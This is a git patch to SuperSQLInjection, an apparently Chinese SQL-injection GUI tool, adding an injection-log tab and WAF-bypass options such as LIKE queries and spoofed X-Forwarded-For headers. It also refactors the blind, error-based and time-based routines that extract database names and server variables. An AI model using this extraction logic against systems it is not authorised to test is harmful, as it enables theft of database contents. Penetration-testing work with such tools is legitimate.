From cf2c3990f23079268e7cf53ceaf0212930dc2dac Mon Sep 17 00:00:00 2001 From: shack2 <1341413415@qq.com> Date: Tue, 4 Dec 2018 23:30:51 +0800 Subject: [PATCH] update20181204 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 20181204 V1.0 正式版--- 优化注入配置文件,降低误报和漏报。 优化执行命令,文件读取模块解决部分情况无法执行命令或无法读取文件的情况。 修复SQLServer通过错误显示方式无法获取数据的情况。 优化部分代码。 增加自动识别注入记录,可将一个URL每一个参数存在的盲注、报错注入、Union注入都记录下来,可灵活选择对应的注入类型。 --- SuperSQLInjection/Main.Designer.cs | 194 ++++- SuperSQLInjection/Main.cs | 722 ++++++++---------- SuperSQLInjection/Main.resx | 347 ++++----- SuperSQLInjection/ShowResponse.cs | 11 + SuperSQLInjection/SuperSQLInjection.csproj | 6 +- SuperSQLInjection/model/Config.cs | 8 +- SuperSQLInjection/model/DBType.cs | 5 +- SuperSQLInjection/model/InjectLog.cs | 21 + SuperSQLInjection/model/ServerInfo.cs | 1 + SuperSQLInjection/payload/MSSQL.cs | 20 +- .../payload/{MySQL5.cs => MySQL.cs} | 2 +- SuperSQLInjection/tools/Tools.cs | 236 +++++- SuperSQLInjection/tools/http/HTTP.cs | 9 +- .../tools/http/model/HttpRequest.cs | 12 + .../tools/http/model/HttpResponse.cs | 11 + 15 files changed, 974 insertions(+), 631 deletions(-) create mode 100644 SuperSQLInjection/model/InjectLog.cs rename SuperSQLInjection/payload/{MySQL5.cs => MySQL.cs} (99%) create mode 100644 SuperSQLInjection/tools/http/model/HttpRequest.cs create mode 100644 SuperSQLInjection/tools/http/model/HttpResponse.cs diff --git a/SuperSQLInjection/Main.Designer.cs b/SuperSQLInjection/Main.Designer.cs index 465b013..70ab017 100644 --- a/SuperSQLInjection/Main.Designer.cs +++ b/SuperSQLInjection/Main.Designer.cs @@ -217,6 +217,7 @@ this.label18 = new System.Windows.Forms.Label(); this.label17 = new System.Windows.Forms.Label(); this.bypass_cbox_sendHTTPSleepTime = new System.Windows.Forms.ComboBox(); + this.bypass_chk_useLike = new System.Windows.Forms.CheckBox(); this.bypass_chk_usebetween = new System.Windows.Forms.CheckBox(); this.bypass_chk_use_unicode = new System.Windows.Forms.CheckBox(); this.bypass_hex = new System.Windows.Forms.CheckBox(); @@ -281,6 +282,20 @@ this.scanInjection_domainsCount = new System.Windows.Forms.Label(); this.scanInjection_scanedDomainCount = new System.Windows.Forms.Label(); this.label25 = new System.Windows.Forms.Label(); + this.tab_injectLog = new System.Windows.Forms.TabPage(); + this.lvw_injectLog = new System.Windows.Forms.ListView(); + this.injectlog_col_ip = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_port = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_uri = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_pname = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_injectType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_dbType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_payload = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_time = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectLog_cm = new System.Windows.Forms.ContextMenuStrip(this.components); + this.tsmi_injectLog_useCLog = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_injectLog_delSLog = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_injectLog_clearAllLog = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.status_lbl_time = new System.Windows.Forms.ToolStripStatusLabel(); @@ -367,6 +382,8 @@ this.scanInjectionURL_cms.SuspendLayout(); this.scanInjection_cms.SuspendLayout(); this.groupBox12.SuspendLayout(); + this.tab_injectLog.SuspendLayout(); + this.injectLog_cm.SuspendLayout(); this.statusStrip1.SuspendLayout(); this.SuspendLayout(); // @@ -2096,9 +2113,10 @@ this.mytab.Controls.Add(this.tab_bypass); this.mytab.Controls.Add(this.tab_encoding); this.mytab.Controls.Add(this.tab_scanInjection); + this.mytab.Controls.Add(this.tab_injectLog); this.mytab.Controls.Add(this.tab_logCenter); this.mytab.ImageList = this.myicon_list; - this.mytab.Location = new System.Drawing.Point(9, 120); + this.mytab.Location = new System.Drawing.Point(8, 120); this.mytab.Name = "mytab"; this.mytab.SelectedIndex = 0; this.mytab.Size = new System.Drawing.Size(840, 478); @@ -2208,6 +2226,7 @@ this.groupBox9.Controls.Add(this.label18); this.groupBox9.Controls.Add(this.label17); this.groupBox9.Controls.Add(this.bypass_cbox_sendHTTPSleepTime); + this.groupBox9.Controls.Add(this.bypass_chk_useLike); this.groupBox9.Controls.Add(this.bypass_chk_usebetween); this.groupBox9.Controls.Add(this.bypass_chk_use_unicode); this.groupBox9.Controls.Add(this.bypass_hex); @@ -2230,9 +2249,9 @@ // this.groupBox18.Controls.Add(this.bypass_btn_saveTemplate); this.groupBox18.Controls.Add(this.bypass_cbox_loadTemplate); - this.groupBox18.Location = new System.Drawing.Point(426, 177); + this.groupBox18.Location = new System.Drawing.Point(426, 173); this.groupBox18.Name = "groupBox18"; - this.groupBox18.Size = new System.Drawing.Size(371, 55); + this.groupBox18.Size = new System.Drawing.Size(383, 55); this.groupBox18.TabIndex = 25; this.groupBox18.TabStop = false; this.groupBox18.Text = "选择绕过模板"; @@ -2276,13 +2295,13 @@ this.cbox_base64Count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.cbox_base64Count.FormattingEnabled = true; this.cbox_base64Count.Items.AddRange(new object[] { - "选择Base64编码", - "Base64编码一次", - "Base64编码二次", - "Base64编码三次"}); - this.cbox_base64Count.Location = new System.Drawing.Point(593, 130); + "选择", + "一次", + "二次", + "三次"}); + this.cbox_base64Count.Location = new System.Drawing.Point(507, 23); this.cbox_base64Count.Name = "cbox_base64Count"; - this.cbox_base64Count.Size = new System.Drawing.Size(216, 20); + this.cbox_base64Count.Size = new System.Drawing.Size(66, 20); this.cbox_base64Count.TabIndex = 22; this.cbox_base64Count.SelectedIndexChanged += new System.EventHandler(this.cbox_base64Count_SelectedIndexChanged); this.cbox_base64Count.TextChanged += new System.EventHandler(this.cbox_base64Count_TextChanged); @@ -2307,16 +2326,16 @@ "随机大小写", "关键字大写", "关键字小写"}); - this.cob_keyRepalce.Location = new System.Drawing.Point(671, 58); + this.cob_keyRepalce.Location = new System.Drawing.Point(680, 58); this.cob_keyRepalce.Name = "cob_keyRepalce"; - this.cob_keyRepalce.Size = new System.Drawing.Size(138, 20); + this.cob_keyRepalce.Size = new System.Drawing.Size(129, 20); this.cob_keyRepalce.TabIndex = 17; this.cob_keyRepalce.SelectedIndexChanged += new System.EventHandler(this.cob_keyRepalce_SelectedIndexChanged); // // label10 // this.label10.AutoSize = true; - this.label10.Location = new System.Drawing.Point(588, 61); + this.label10.Location = new System.Drawing.Point(595, 61); this.label10.Name = "label10"; this.label10.Size = new System.Drawing.Size(65, 12); this.label10.TabIndex = 16; @@ -2330,9 +2349,9 @@ "X-Forwarded-For", "Remote-Addr", "Client_Ip"}); - this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(671, 93); + this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(680, 94); this.bypass_cbox_randIPToHeader.Name = "bypass_cbox_randIPToHeader"; - this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(138, 20); + this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(129, 20); this.bypass_cbox_randIPToHeader.TabIndex = 14; this.bypass_cbox_randIPToHeader.TextChanged += new System.EventHandler(this.bypass_cbox_randIPToHeader_TextChanged); // @@ -2348,16 +2367,16 @@ // label31 // this.label31.AutoSize = true; - this.label31.Location = new System.Drawing.Point(427, 133); + this.label31.Location = new System.Drawing.Point(424, 27); this.label31.Name = "label31"; - this.label31.Size = new System.Drawing.Size(125, 12); + this.label31.Size = new System.Drawing.Size(77, 12); this.label31.TabIndex = 13; - this.label31.Text = "进行Base64编码处理:"; + this.label31.Text = "Base64编码:"; // // label18 // this.label18.AutoSize = true; - this.label18.Location = new System.Drawing.Point(588, 97); + this.label18.Location = new System.Drawing.Point(595, 97); this.label18.Name = "label18"; this.label18.Size = new System.Drawing.Size(65, 12); this.label18.TabIndex = 13; @@ -2396,16 +2415,27 @@ "8000", "9000", "10000"}); - this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(494, 58); + this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(507, 58); this.bypass_cbox_sendHTTPSleepTime.Name = "bypass_cbox_sendHTTPSleepTime"; - this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(56, 20); + this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(66, 20); this.bypass_cbox_sendHTTPSleepTime.TabIndex = 11; this.bypass_cbox_sendHTTPSleepTime.TextChanged += new System.EventHandler(this.bypass_cbox_sendHTTPSleepTime_TextChanged); // + // bypass_chk_useLike + // + this.bypass_chk_useLike.AutoSize = true; + this.bypass_chk_useLike.Location = new System.Drawing.Point(597, 131); + this.bypass_chk_useLike.Name = "bypass_chk_useLike"; + this.bypass_chk_useLike.Size = new System.Drawing.Size(144, 16); + this.bypass_chk_useLike.TabIndex = 3; + this.bypass_chk_useLike.Text = "使用like查询进行绕过"; + this.bypass_chk_useLike.UseVisualStyleBackColor = true; + this.bypass_chk_useLike.CheckedChanged += new System.EventHandler(this.bypass_chk_useLike_CheckedChanged); + // // bypass_chk_usebetween // this.bypass_chk_usebetween.AutoSize = true; - this.bypass_chk_usebetween.Location = new System.Drawing.Point(426, 96); + this.bypass_chk_usebetween.Location = new System.Drawing.Point(426, 131); this.bypass_chk_usebetween.Name = "bypass_chk_usebetween"; this.bypass_chk_usebetween.Size = new System.Drawing.Size(138, 16); this.bypass_chk_usebetween.TabIndex = 3; @@ -2416,7 +2446,7 @@ // bypass_chk_use_unicode // this.bypass_chk_use_unicode.AutoSize = true; - this.bypass_chk_use_unicode.Location = new System.Drawing.Point(671, 27); + this.bypass_chk_use_unicode.Location = new System.Drawing.Point(680, 27); this.bypass_chk_use_unicode.Name = "bypass_chk_use_unicode"; this.bypass_chk_use_unicode.Size = new System.Drawing.Size(138, 16); this.bypass_chk_use_unicode.TabIndex = 3; @@ -2427,7 +2457,7 @@ // bypass_hex // this.bypass_hex.AutoSize = true; - this.bypass_hex.Location = new System.Drawing.Point(590, 27); + this.bypass_hex.Location = new System.Drawing.Point(594, 25); this.bypass_hex.Name = "bypass_hex"; this.bypass_hex.Size = new System.Drawing.Size(66, 16); this.bypass_hex.TabIndex = 3; @@ -2438,7 +2468,7 @@ // bypass_chk_inculdeStr // this.bypass_chk_inculdeStr.AutoSize = true; - this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(426, 26); + this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(426, 96); this.bypass_chk_inculdeStr.Name = "bypass_chk_inculdeStr"; this.bypass_chk_inculdeStr.Size = new System.Drawing.Size(126, 16); this.bypass_chk_inculdeStr.TabIndex = 3; @@ -3031,6 +3061,105 @@ this.label25.TabIndex = 13; this.label25.Text = "已爬行:"; // + // tab_injectLog + // + this.tab_injectLog.Controls.Add(this.lvw_injectLog); + this.tab_injectLog.Location = new System.Drawing.Point(4, 23); + this.tab_injectLog.Name = "tab_injectLog"; + this.tab_injectLog.Padding = new System.Windows.Forms.Padding(3); + this.tab_injectLog.Size = new System.Drawing.Size(832, 451); + this.tab_injectLog.TabIndex = 10; + this.tab_injectLog.Text = "识别注入记录"; + this.tab_injectLog.UseVisualStyleBackColor = true; + // + // lvw_injectLog + // + this.lvw_injectLog.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.injectlog_col_ip, + this.injectlog_col_port, + this.injectlog_col_uri, + this.injectlog_col_pname, + this.injectlog_col_injectType, + this.injectlog_col_dbType, + this.injectlog_col_payload, + this.injectlog_col_time}); + this.lvw_injectLog.ContextMenuStrip = this.injectLog_cm; + this.lvw_injectLog.Dock = System.Windows.Forms.DockStyle.Fill; + this.lvw_injectLog.FullRowSelect = true; + this.lvw_injectLog.Location = new System.Drawing.Point(3, 3); + this.lvw_injectLog.Name = "lvw_injectLog"; + this.lvw_injectLog.Size = new System.Drawing.Size(826, 445); + this.lvw_injectLog.TabIndex = 1; + this.lvw_injectLog.UseCompatibleStateImageBehavior = false; + this.lvw_injectLog.View = System.Windows.Forms.View.Details; + // + // injectlog_col_ip + // + this.injectlog_col_ip.Text = "IP"; + // + // injectlog_col_port + // + this.injectlog_col_port.Text = "端口"; + // + // injectlog_col_uri + // + this.injectlog_col_uri.Text = "资源路径"; + // + // injectlog_col_pname + // + this.injectlog_col_pname.Text = "参数名称"; + this.injectlog_col_pname.Width = 82; + // + // injectlog_col_injectType + // + this.injectlog_col_injectType.Text = "注入类型"; + this.injectlog_col_injectType.Width = 71; + // + // injectlog_col_dbType + // + this.injectlog_col_dbType.Text = "数据库类型"; + this.injectlog_col_dbType.Width = 86; + // + // injectlog_col_payload + // + this.injectlog_col_payload.Text = "测试Payload"; + this.injectlog_col_payload.Width = 259; + // + // injectlog_col_time + // + this.injectlog_col_time.Text = "记录时间"; + this.injectlog_col_time.Width = 109; + // + // injectLog_cm + // + this.injectLog_cm.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_injectLog_useCLog, + this.tsmi_injectLog_delSLog, + this.tsmi_injectLog_clearAllLog}); + this.injectLog_cm.Name = "contextMenuStrip1"; + this.injectLog_cm.Size = new System.Drawing.Size(185, 70); + // + // tsmi_injectLog_useCLog + // + this.tsmi_injectLog_useCLog.Name = "tsmi_injectLog_useCLog"; + this.tsmi_injectLog_useCLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_useCLog.Text = "选择此记录进行注入"; + this.tsmi_injectLog_useCLog.Click += new System.EventHandler(this.tsmi_injectLog_useCLog_Click); + // + // tsmi_injectLog_delSLog + // + this.tsmi_injectLog_delSLog.Name = "tsmi_injectLog_delSLog"; + this.tsmi_injectLog_delSLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_delSLog.Text = "删除选择记录"; + this.tsmi_injectLog_delSLog.Click += new System.EventHandler(this.tsmi_injectLog_delSLog_Click); + // + // tsmi_injectLog_clearAllLog + // + this.tsmi_injectLog_clearAllLog.Name = "tsmi_injectLog_clearAllLog"; + this.tsmi_injectLog_clearAllLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_clearAllLog.Text = "清空记录"; + this.tsmi_injectLog_clearAllLog.Click += new System.EventHandler(this.tsmi_injectLog_clearAllLog_Click); + // // statusStrip1 // this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { @@ -3277,6 +3406,8 @@ this.scanInjection_cms.ResumeLayout(false); this.groupBox12.ResumeLayout(false); this.groupBox12.PerformLayout(); + this.tab_injectLog.ResumeLayout(false); + this.injectLog_cm.ResumeLayout(false); this.statusStrip1.ResumeLayout(false); this.statusStrip1.PerformLayout(); this.ResumeLayout(false); @@ -3557,6 +3688,21 @@ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_selectAllSubNode; private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_selectReversSubNode; private System.Windows.Forms.RichTextBox txt_log; + private System.Windows.Forms.CheckBox bypass_chk_useLike; + private System.Windows.Forms.TabPage tab_injectLog; + private System.Windows.Forms.ListView lvw_injectLog; + private System.Windows.Forms.ColumnHeader injectlog_col_uri; + private System.Windows.Forms.ColumnHeader injectlog_col_pname; + private System.Windows.Forms.ColumnHeader injectlog_col_injectType; + private System.Windows.Forms.ColumnHeader injectlog_col_dbType; + private System.Windows.Forms.ColumnHeader injectlog_col_payload; + private System.Windows.Forms.ColumnHeader injectlog_col_time; + private System.Windows.Forms.ContextMenuStrip injectLog_cm; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_useCLog; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_delSLog; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_clearAllLog; + private System.Windows.Forms.ColumnHeader injectlog_col_ip; + private System.Windows.Forms.ColumnHeader injectlog_col_port; } } diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs index e5f0b41..6d327c4 100644 --- a/SuperSQLInjection/Main.cs +++ b/SuperSQLInjection/Main.cs @@ -140,7 +140,19 @@ namespace SuperSQLInjection { new Thread(checkUpdate).Start(); } - + //加载注入日志记录 + Thread tt = new Thread(loadInjectLogs); + tt.Start(); + + } + public void loadInjectLogs() { + //加载注入日志记录 + List clist = Tools.readAllXmlFile(AppDomain.CurrentDomain.BaseDirectory + "/logs/injection/", null); + foreach (String path in clist) + { + Config config = XML.readConfig(path); + this.Invoke(new delegatelogInject(logInjectTolvw), config); + } } public void HttpDownloadFile(string url, string path) { @@ -218,7 +230,7 @@ namespace SuperSQLInjection return sid; } - public static int version = 20181119; + public static int version = 20181204; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version; //检查更新 public void checkUpdate() @@ -255,13 +267,12 @@ namespace SuperSQLInjection } else { - - MessageBox.Show("自动检查更新,没有发现新版本!"); + this.Invoke(new showLogDelegate(log), "自动检查更新,没有发现新版本!", LogLevel.info); } } catch (Exception e) { - MessageBox.Show("未发现新版本!"); + this.Invoke(new showLogDelegate(log), "更新异常!" + e.Message, LogLevel.info); } } @@ -297,22 +308,8 @@ namespace SuperSQLInjection MessageBox.Show("注入类型还未设置,您可以人工设置或点击自动识别!"); return false; } - - switch (this.cbox_basic_injectType.SelectedIndex) - { - case 0: - config.injectType = InjectType.UnKnow; - break; - case 1: - config.injectType = InjectType.Bool; - break; - case 2: - config.injectType = InjectType.Error; - break; - case 3: - config.injectType = InjectType.Union; - break; - } + config.injectType = (InjectType)this.cbox_basic_injectType.SelectedIndex; + if (DBType.UnKnow.Equals(config.dbType)) { @@ -320,29 +317,8 @@ namespace SuperSQLInjection return false; } - switch (this.cbox_basic_dbType.SelectedIndex) - { - case 0: - config.dbType = DBType.UnKnow; - break; - case 1: - config.dbType = DBType.Access; - break; - case 2: - config.dbType = DBType.MySQL5; - break; - case 3: - config.dbType = DBType.SQLServer; - break; - case 4: - config.dbType = DBType.Oracle; - break; - case 5: - config.dbType = DBType.MySQL4; - break; - } - - + config.dbType = (DBType)this.cbox_basic_dbType.SelectedIndex; + try { config.timeOut = int.Parse(this.cbox_basic_timeOut.Text); @@ -579,8 +555,8 @@ namespace SuperSQLInjection String[] sv = v.ToString().Split(':'); List column_list = new List(); column_list.Add(sv[1]); - String columns = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, column_list, null, null, -1); - String pay_load = MySQL5.union_value.Replace("{data}", columns); + String columns = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, column_list, null, null, -1); + String pay_load = MySQL.union_value.Replace("{data}", columns); String result = getOneDataByUnionOrError(pay_load); this.Invoke(new setVariableDelegate(setVariable), sv[0], result); Interlocked.Increment(ref this.currentDataCount); @@ -611,8 +587,8 @@ namespace SuperSQLInjection String[] sv = v.ToString().Split(':'); List column_list = new List(); column_list.Add(sv[1]); - String columns = MySQL5.creatMySQLColumnsStrByError(column_list, null, null, -1); - String pay_load = MySQL5.error_value.Replace("{data}", columns); + String columns = MySQL.creatMySQLColumnsStrByError(column_list, null, null, -1); + String pay_load = MySQL.error_value.Replace("{data}", columns); String result = getOneDataByUnionOrError(pay_load); this.Invoke(new setVariableDelegate(setVariable), sv[0], result); Interlocked.Increment(ref this.currentDataCount); @@ -663,14 +639,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("报告大侠,Access数据库不支持此功能!"); break; - case DBType.MySQL4: break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 stp.QueueWorkItem(getVariablesByUnionByMySQL5, v); } @@ -727,17 +702,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉,Access数据库不支持错误显示方式注入!"); break; - - case DBType.MySQL4: - MessageBox.Show("抱歉,MySQL4以下版本不支持错误显示方式注入!"); - break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 stp.QueueWorkItem(getVariablesByErrorByMySQL5, v); } @@ -795,16 +766,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("报告大侠,Access数据库不支持此功能!"); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 if (config.keyType.Equals(KeyType.Time)) { @@ -935,10 +903,10 @@ namespace SuperSQLInjection try { String[] vs = vers.ToString().Split(':'); - String payload_len = MySQL5.ver_length.Replace("{data}", vs[1]); + String payload_len = MySQL.ver_length.Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); - String va_payload = MySQL5.ver_value.Replace("{data}", vs[1]); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); + String va_payload = MySQL.ver_value.Replace("{data}", vs[1]); String value = ""; //获取值 for (int i = 1; i <= len; i++) @@ -947,7 +915,7 @@ namespace SuperSQLInjection int ascii = getValue(tmp_va_payload, 32, 126); value += ((char)ascii).ToString(); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -965,11 +933,11 @@ namespace SuperSQLInjection { String[] vs = vers.ToString().Split(':'); - String payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]); + String payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length, config.maxTime).Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); - String va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); + String va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value, config.maxTime).Replace("{data}", vs[1]); String value = ""; //获取值 for (int i = 1; i <= len; i++) @@ -978,7 +946,7 @@ namespace SuperSQLInjection int ascii = getValue(tmp_va_payload, 32, 126); value += ((char)ascii).ToString(); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1003,7 +971,7 @@ namespace SuperSQLInjection //判断变量长度 String payload_len = MSSQL.getBoolCountBySleep(MSSQL.bool_length, config.maxTime).Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); String va_payload = MSSQL.getBoolCountBySleep(MSSQL.bool_value, config.maxTime).Replace("{data}", vs[1]); String value = ""; //获取值 @@ -1017,7 +985,7 @@ namespace SuperSQLInjection value += Tools.unHexByUnicode(unicode, config.db_encoding); //设置值,这里由于是unicode值,需要转换 } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value,LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value,LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1038,21 +1006,27 @@ namespace SuperSQLInjection String[] vs = vers.ToString().Split(':'); //判断变量长度 int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", vs[1]), 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len,LogLevel.info); String value = ""; - //获取值 - for (int i = 1; i <= len; i++) + if (config.useLike) { - - //select UNICODE(substring(@@version,{index},1)) - //取值payload,替换对应下标值 - String unicode_data_payload = MSSQL.nocast_unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + ""); - int unicode = getValue(MSSQL.bool_value.Replace("{data}", unicode_data_payload), 32, 126); - - value += Tools.unHexByUnicode(unicode, config.db_encoding); - //设置值,这里由于是unicode值,需要转换 + value= getLikeValue(vs[1]); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + else { + //获取值 + for (int i = 1; i <= len; i++) + { + + //select UNICODE(substring(@@version,{index},1)) + //取值payload,替换对应下标值 + String unicode_data_payload = MSSQL.nocast_unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + ""); + int unicode = getValue(MSSQL.bool_value.Replace("{data}", unicode_data_payload), 32, 126); + + value += Tools.unHexByUnicode(unicode, config.db_encoding); + //设置值,这里由于是unicode值,需要转换 + } + } + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1075,7 +1049,7 @@ namespace SuperSQLInjection String[] vs = vers.ToString().Split(':'); //判断变量长度 int len = getValueByStepUp(Oracle.bool_length.Replace("{data}", vs[1]), 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); String va_payload = Oracle.bool_value.Replace("{data}", vs[1]); String value = ""; @@ -1086,7 +1060,7 @@ namespace SuperSQLInjection int ascii = getValue(dp, 32, 126); value += (char)ascii; } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1135,22 +1109,22 @@ namespace SuperSQLInjection { int db_index = int.Parse(oindex.ToString()); //判断对应下标的数据库长度 - String payload_len = MySQL5.ver_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())); + String payload_len = MySQL.ver_length.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())); if (config.keyType.Equals(KeyType.Time)) { - payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime); + payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())), config.maxTime); } //判断当前数据库长度限制1-50 int len = getValue(payload_len, 1, 50); - this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为:" + len, LogLevel.info); //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())); + String va_payload = MySQL.ver_value.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())); if (config.keyType.Equals(KeyType.Time)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value.Replace("{data}", MySQL.db_value.Replace("{index}", oindex.ToString())), config.maxTime); } String value = ""; //获取值 @@ -1191,7 +1165,7 @@ namespace SuperSQLInjection String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString()); int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10); - this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为:" + len,LogLevel.info); //判断当前数据库对应的ascii码 String va_payload = MSSQL.bool_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString())); @@ -1247,7 +1221,7 @@ namespace SuperSQLInjection String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString()); int len = 